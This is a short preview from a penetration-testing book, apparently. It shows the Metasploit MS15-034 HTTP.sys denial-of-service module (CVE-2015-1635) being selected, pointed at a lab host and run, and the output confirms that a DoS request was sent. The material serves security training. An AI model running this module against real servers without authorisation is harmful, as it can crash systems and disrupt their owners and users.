February 2018
Intermediate to advanced
426 pages
11h 3m
English
We will start by having a look at the MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service auxiliary module. This module checks if hosts are vulnerable to CVE-2015-1635 (MS15-034), a vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code execution.
msf > use auxiliary/dos/http/ms15_034_ulonglongaddmsf auxiliary(dos/http/ms15_034_ulonglongadd) > set RHOSTS 192.168.216.10RHOSTS => 192.168.216.10msf auxiliary(dos/http/ms15_034_ulonglongadd) > run[*] DOS request sent[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completedmsf auxiliary(dos/http/ms15_034_ulonglongadd) >
Looking ...
Read now
Unlock full access